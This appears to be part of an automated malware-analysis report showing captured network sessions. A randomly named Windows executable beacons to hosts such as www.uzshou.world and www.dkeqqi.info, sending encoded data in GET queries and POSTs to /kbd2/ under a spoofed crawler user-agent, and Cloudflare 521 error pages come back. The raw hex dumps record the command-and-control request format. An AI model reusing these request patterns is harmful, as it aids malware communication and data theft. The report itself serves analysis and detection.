6b 47 73 76 51 41 31 42 2f 77 6a 57 39 49 73 36 78 62 54 66 78 45 50 41 68 73 36 52 2b 63 37 49 57 69 69 54 74 79 2b 33 57 71 34 69 4a 5a 51 68 39 74 45 6e 6e 35 39 4b 30 75 4d 64 57 46 79 59 58 72 48 67 48 4a 4b 71 57 4f 35 78 57 79 57 34 4a 76 32 45 73 30 63 35 7a 34 42 32 70 75 70 45 64 74 78 52 52 41 47 33 67 51 2b 4f 74 4c 6f 43 35 79 63 62 7a 48 77 39 51 57 4e 65 44 6c 6a 50 6d 6b 31 68 42 43 69 4e 31 [TRUNCATED] Data Ascii: cNPH=m6goXqOr8YkhuZhWS7uV1Oy1TGlrnIiPpQ8RGxUEnDkKRikqb8CheOaXVPMQSgEv9SA4Jy70YBzzp2azjFf4v9oTEWhUIljoXaGfisJ1Hi8YHrm5Z9nmFZGLoSxlA8eH1Qpy9Shzf0cRRZ+/uX0drN7Fri28wu4vdWeO4CXbZTVgqRT4rUXpZnkWacLxtICMdECGkGsvQA1B/wjW9Is6xbTfxEPAhs6R+c7IWiiTty+3Wq4iJZQh9tEnn59K0uMdWFyYXrHgHJKqWO5xWyW4Jv2Es0c5z4B2pupEdtxRRAG3gQ+OtLoC5ycbzHw9QWNeDljPmk1hBCiN1ysqTEn+T0KUU59C7udlwaf8A3aV643qeSDyFUnTwwlgKDt2WnCC1bqCxcRoteDV3SfXuFhAi5GsOUAnf5FhZRWHuoTK1cOzkSeQ2O99uFpW+CpPysy2hh3g58pAqizz5gSFXB4tI5D7CtCgzNnIP3KvZfQOgpYdvjSRVUcAu8Q/TE0+BxG7UfkZcDr+9LgF/1lzvCMA3P7qHgVJYvdrGZ7oI5vmWElj4ToPYXg9caJMKphwwU2GkceL7CJC611DD5/+7AV/X90XJoW506M5vgUj1sqY4oEDxwEq2XRfmTGanZ9fIwMBnNRn45rHSIIiDi4DcvzFL0tzqVbRVUowcha7AmoC6oSBlQQwVsAEKRDcO8XzuBiaILXmsVzfsSYHqDrlV1+MqEYZsQWmcEbznNC0Fjcok6smVsNctnBTiKrbqF9L57jAlvXTGqghVNzDCgZJkqYVOcD932ET+wuSOvMG10lapB5dq+n8JdGBB2KrXTVzU+rb0/qshYp1EEj9qOH2KF0VlCUvVgI1Ds3Up2cMsZQJggz9gzehGwFKWrLGxWgBrCsAAxtPnOcgWJTcZS+opzGEo3I4DL3fYX4MdteeXjKWnT1tNtyoJm42Dcvj/wx3UbqKNfSaJh34g0Z0aOpBbA4/GV12rBOwqGSX5dy/ogRusthjZjy [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.7	50009	47.83.1.90	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:00.903713942 CET	437	OUT	GET /1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.dkeqqi.info Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 02:47:02.474479914 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 01:47:02 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.7	50010	104.21.96.1	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:07.534090996 CET	688	OUT	POST /kbd2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.uzshou.world Origin: http://www.uzshou.world Referer: http://www.uzshou.world/kbd2/ Content-Length: 217 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6a 64 78 62 53 6f 35 4d 6c 49 56 68 5a 55 4c 59 7a 47 4a 65 6f 7a 49 59 62 78 61 74 31 36 76 4c 69 55 54 51 77 59 6f 6d 66 6a 56 76 73 41 6b 67 4a 6a 2f 78 4a 78 67 79 66 46 2f 42 52 43 5a 4b 35 31 67 4b 42 71 47 35 62 33 41 4b 45 6b 75 37 36 43 61 7a 63 4c 5a 62 62 4f 4a 56 64 66 52 71 58 63 34 6e 50 52 67 35 35 63 59 64 42 43 50 55 39 4b 4d 63 71 32 45 45 6b 39 78 68 35 30 59 34 4b 69 49 42 2b 4e 48 51 4b 4b 71 45 62 4d 6e 45 52 45 45 53 41 73 2f 33 66 77 44 2b 70 34 31 5a 63 62 68 48 54 61 4c 78 42 34 42 79 6d 53 45 46 74 68 4c 76 48 44 4b 4b 51 6b 4c 54 54 6b 73 4b 69 72 2b 33 73 64 38 4e 7a 62 68 31 30 46 61 4a 50 77 3d 3d Data Ascii: cNPH=jdxbSo5MlIVhZULYzGJeozIYbxat16vLiUTQwYomfjVvsAkgJj/xJxgyfF/BRCZK51gKBqG5b3AKEku76CazcLZbbOJVdfRqXc4nPRg55cYdBCPU9KMcq2EEk9xh50Y4KiIB+NHQKKqEbMnEREESAs/3fwD+p41ZcbhHTaLxB4BymSEFthLvHDKKQkLTTksKir+3sd8Nzbh10FaJPw==
Jan 11, 2025 02:47:08.097610950 CET	1236	IN	HTTP/1.1 521 Date: Sat, 11 Jan 2025 01:47:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6835 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2LhYx7f2Hy6ajb4WcOCtVoRgP4ODFETNjksDrm8K3S7tez7FTh5ZOUvrJS9gwDBjFv%2FTnbmCYCMeJzM8IjIDxAYAhFrrNxF1vjs6bek%2FPthR1PRU9qc%2BvwZCQqJzipueJmYD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 90013cae9b4172a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1979&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=688&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US">
Jan 11, 2025 02:47:08.097635984 CET	1236	IN	Data Raw: 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 75 7a 73 68 6f 75 2e 77 6f 72 6c 64 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c 65 Data Ascii: ...<![endif]--><head><title>www.uzshou.world \| 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta na
Jan 11, 2025 02:47:08.097654104 CET	448	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 Data Ascii: <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:borde
Jan 11, 2025 02:47:08.097667933 CET	1236	IN	Data Raw: 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 6f 6b 20 77 2d 31 32 20 68 2d 31 32 20 61 62 73 6f 6c 75 74 65 20 6c 65 66 74 2d 31 2f 32 20 6d 64 3a 6c 65 66 74 2d 61 75 74 6f 20 6d 64 3a 72 69 67 68 74 2d 30 20 Data Ascii: > <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </div> <span class="md:block w-full truncate">You</span> <h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-
Jan 11, 2025 02:47:08.097680092 CET	1236	IN	Data Raw: 63 61 6d 70 61 69 67 6e 3d 77 77 77 2e 75 7a 73 68 6f 75 2e 77 6f 72 6c 64 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 43 6c 6f 75 64 66 6c 61 Data Ascii: campaign=www.uzshou.world" target="_blank" rel="noopener noreferrer"> Cloudflare </a> </h3> <span class="leading-1.3 text-2xl text-green-success">Working</span></div><div id="cf-host-status" class="cf-error-source relative w-1/3
Jan 11, 2025 02:47:08.097743988 CET	448	IN	Data Raw: 74 20 68 61 70 70 65 6e 65 64 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 65 20 77 65 62 20 73 65 72 76 65 72 20 69 73 20 6e 6f 74 20 72 65 74 75 72 6e 69 6e 67 20 61 20 63 6f 6e 6e 65 63 74 69 Data Ascii: t happened?</h2> <p>The web server is not returning a connection. As a result, the web page is not displaying.</p> </div> <div class="w-1/2 md:w-full float-left leading-relaxed">
Jan 11, 2025 02:47:08.097755909 CET	1236	IN	Data Raw: 36 22 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 69 6e 20 61 20 66 65 77 20 6d 69 6e 75 74 65 73 2e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 35 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 Data Ascii: 6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel=
Jan 11, 2025 02:47:08.097769976 CET	697	IN	Data Raw: 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 Data Ascii: formance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.uzshou.world" id="brand_link" target="_blank">Cloudflare</a></span> </p> <scri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.7	50011	104.21.96.1	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:10.082724094 CET	708	OUT	POST /kbd2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.uzshou.world Origin: http://www.uzshou.world Referer: http://www.uzshou.world/kbd2/ Content-Length: 237 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6a 64 78 62 53 6f 35 4d 6c 49 56 68 44 31 62 59 67 77 42 65 35 44 49 66 65 78 61 74 2f 61 76 50 69 55 66 51 77 62 6c 39 66 51 39 76 74 6b 30 67 49 69 2f 78 48 52 67 79 48 56 2f 41 66 69 59 47 35 31 63 34 42 72 36 35 62 33 45 4b 45 6d 6d 37 37 78 43 77 61 62 5a 5a 41 2b 4a 41 54 2f 52 71 58 63 34 6e 50 52 30 54 35 59 30 64 42 79 66 55 76 2f 77 66 32 6d 45 46 6a 39 78 68 72 45 59 38 4b 69 49 76 2b 50 7a 70 4b 49 53 45 62 4d 58 45 52 77 51 54 4a 73 2f 78 62 77 44 74 36 74 63 7a 54 59 46 59 5a 4d 53 71 44 4c 38 54 75 45 46 6e 33 44 48 44 5a 53 79 78 55 6d 76 6c 45 43 78 2f 67 71 36 76 68 2f 49 73 73 73 45 66 35 58 37 4e 5a 49 75 69 4b 4d 6c 68 2b 74 79 49 38 49 43 69 55 2b 50 79 53 54 6f 3d Data Ascii: cNPH=jdxbSo5MlIVhD1bYgwBe5DIfexat/avPiUfQwbl9fQ9vtk0gIi/xHRgyHV/AfiYG51c4Br65b3EKEmm77xCwabZZA+JAT/RqXc4nPR0T5Y0dByfUv/wf2mEFj9xhrEY8KiIv+PzpKISEbMXERwQTJs/xbwDt6tczTYFYZMSqDL8TuEFn3DHDZSyxUmvlECx/gq6vh/IsssEf5X7NZIuiKMlh+tyI8ICiU+PySTo=
Jan 11, 2025 02:47:10.626666069 CET	1236	IN	HTTP/1.1 521 Date: Sat, 11 Jan 2025 01:47:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6835 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8WHLMoS2kO5DBweBtvsArCBIECPUc5kIkqlGyqswKlVefDcFi99wWMFbVTmrmFutK8WgMWtRMAgp9B3TRj1eRnhI8QnUDL1%2FmijSUGZ%2B%2FUmrdM9AJh7IPkgRoOsNr6yJjfC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 90013cbe7a52de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1563&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=708&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US">
Jan 11, 2025 02:47:10.626682997 CET	1236	IN	Data Raw: 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 75 7a 73 68 6f 75 2e 77 6f 72 6c 64 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c 65 Data Ascii: ...<![endif]--><head><title>www.uzshou.world \| 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta na
Jan 11, 2025 02:47:10.626693964 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 Data Ascii: <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:borde
Jan 11, 2025 02:47:10.626768112 CET	1236	IN	Data Raw: 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 6c 6f 75 64 20 62 6c 6f 63 6b 20 6d 64 3a 68 69 64 64 65 6e 20 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f 2d 72 65 70 65 61 74 22 3e 3c 2f 73 70 61 6e Data Ascii: <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:block w-f
Jan 11, 2025 02:47:10.626780033 CET	896	IN	Data Raw: 30 30 20 66 6f 6e 74 2d 6c 69 67 68 74 20 6c 65 61 64 69 6e 67 2d 31 2e 33 22 3e 0a 20 20 20 20 0a 20 20 20 20 48 6f 73 74 0a 20 20 20 20 0a 20 20 3c 2f 68 33 3e 0a 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 65 61 64 69 6e 67 2d 31 2e 33 20 Data Ascii: 00 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> </div> </div> <div class="w-240 lg:w-full mx-auto mb-8 lg:px-8"
Jan 11, 2025 02:47:10.626791954 CET	1236	IN	Data Raw: 36 22 3e 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 69 6e 20 61 20 66 65 77 20 6d 69 6e 75 74 65 73 2e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 3c 68 33 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 35 20 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 Data Ascii: 6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel=
Jan 11, 2025 02:47:10.626796961 CET	697	IN	Data Raw: 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 Data Ascii: formance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.uzshou.world" id="brand_link" target="_blank">Cloudflare</a></span> </p> <scri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.7	50012	104.21.96.1	80	516	C:\Program Files (x86)\EMlfuROJQSPLjWqLjtObBgkSNsbVwRnkvdVIrUfFxDifhJCmdGQqRaSBnz\ClIUTLKtdeP.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:47:12.760415077 CET	1721	OUT	POST /kbd2/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.uzshou.world Origin: http://www.uzshou.world Referer: http://www.uzshou.world/kbd2/ Content-Length: 1249 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 63 4e 50 48 3d 6a 64 78 62 53 6f 35 4d 6c 49 56 68 44 31 62 59 67 77 42 65 35 44 49 66 65 78 61 74 2f 61 76 50 69 55 66 51 77 62 6c 39 66 51 6c 76 74 54 63 67 4a 42 6e 78 45 52 67 79 5a 46 2f 37 66 69 59 4c 35 78 4a 78 42 72 33 4d 62 31 4d 4b 46 45 65 37 38 41 43 77 55 62 5a 5a 66 4f 49 6e 64 66 52 2f 58 63 49 6a 50 53 4d 54 35 59 30 64 42 30 6a 55 2f 36 4d 66 30 6d 45 45 6b 39 78 62 35 30 5a 6a 4b 69 51 5a 2b 50 33 6d 4e 35 79 45 59 6f 7a 45 43 7a 6f 54 49 4d 2f 7a 56 51 43 77 36 74 59 6f 54 59 5a 69 5a 4d 50 2f 44 49 73 54 2f 31 34 6f 72 78 4c 33 4f 67 79 55 57 77 6e 56 4d 78 52 76 6c 38 79 59 6a 4f 30 55 71 64 51 43 30 31 33 53 53 65 48 48 66 36 4e 53 33 4d 32 69 38 2b 79 6e 50 65 44 68 45 45 41 34 66 2b 72 2b 43 62 79 5a 49 6a 70 6c 4e 78 74 63 73 42 4e 35 45 42 50 55 64 4c 4b 2f 31 76 64 6f 65 42 58 6f 78 59 56 5a 69 30 37 76 55 33 5a 30 49 4c 53 35 35 6e 6e 70 39 6f 37 49 4a 6e 6e 50 4f 68 61 65 6d 7a 45 70 64 55 65 56 43 4b 41 47 6b 55 54 6b 6a 53 58 42 68 47 55 43 33 4b 42 48 6f 53 36 6d 69 [TRUNCATED] Data Ascii: cNPH=jdxbSo5MlIVhD1bYgwBe5DIfexat/avPiUfQwbl9fQlvtTcgJBnxERgyZF/7fiYL5xJxBr3Mb1MKFEe78ACwUbZZfOIndfR/XcIjPSMT5Y0dB0jU/6Mf0mEEk9xb50ZjKiQZ+P3mN5yEYozECzoTIM/zVQCw6tYoTYZiZMP/DIsT/14orxL3OgyUWwnVMxRvl8yYjO0UqdQC013SSeHHf6NS3M2i8+ynPeDhEEA4f+r+CbyZIjplNxtcsBN5EBPUdLK/1vdoeBXoxYVZi07vU3Z0ILS55nnp9o7IJnnPOhaemzEpdUeVCKAGkUTkjSXBhGUC3KBHoS6miOiDzvmDRPIxsnlpxspx/9s2Raa/jvhyJUqVkYHTTfMoJkWBF0G2zexkKV6PjVB9EB7W0+Y8apNmggNGhYOdmXvTT1NmSkuxRoMe/yKzK8cYycWW0zfGAr1d7+GJuWnns9wKMjYpn3zV3+/lMQesZoNsJAOzBG6uxOHjHtuLenyIBe2SMTJlr9YxEML7w0yxpMfGjIITlWarVyOTqPRr/fgaAu0JcUC1sZBWJyuN3oLAIHxgHsWaBEG5mWzqLa6iznXV3VNTpFb7DOCqTDau2mSCbu8ubF/E32F/1WYdCtaMPlo+zoCnMnB0Iguf3qnoQztJr0Dm7P1gQn74W9AW5txXtpsoE9cVbjkbsdIt9oArrzJhAyAfLFbjzST5Oc/jGfk0sPduxia4cfZZFeoEUqiLkKOElDBVgjdELXMWpwGd13ZTfE1tb5vmYl33rPl88XtBVp0PBrmxHsbniFCFdazdE6TbiOirka6p617UwOGGu+e7QMTjRoXActFUy/MZjb5tZV1SbG0mRUhTvHdpYaIuPxCT81rIbqIaCLpzGtBNjU765B1WHm3zdY7RBC3tY8eVTc/vVYRn8RaZkxpcOe5NGBmtqUeYDQyM46hNrmqHX0pfvprMk6PfqHjjI2XvlgEcZXInWdS166rq/OjJI1/PUmplABM/H08 [TRUNCATED]
Jan 11, 2025 02:47:13.188975096 CET	1236	IN	HTTP/1.1 521 Date: Sat, 11 Jan 2025 01:47:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 6835 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U5AX8QhsLb1Zw1Fte1SJDpE8nayJ9yBGxzuAGhanhc8OT%2FLS8C4dvGIDZE9oyaASsnJDHUWvoE9Et58hhprFs7BznWzhnhF2%2BoBUS2pMABnGH1Ahhq8ekiIuNjr83aflWczC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 90013cce8ec8de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1592&min_rtt=1592&rtt_var=796&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1721&delivery_rate=0&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 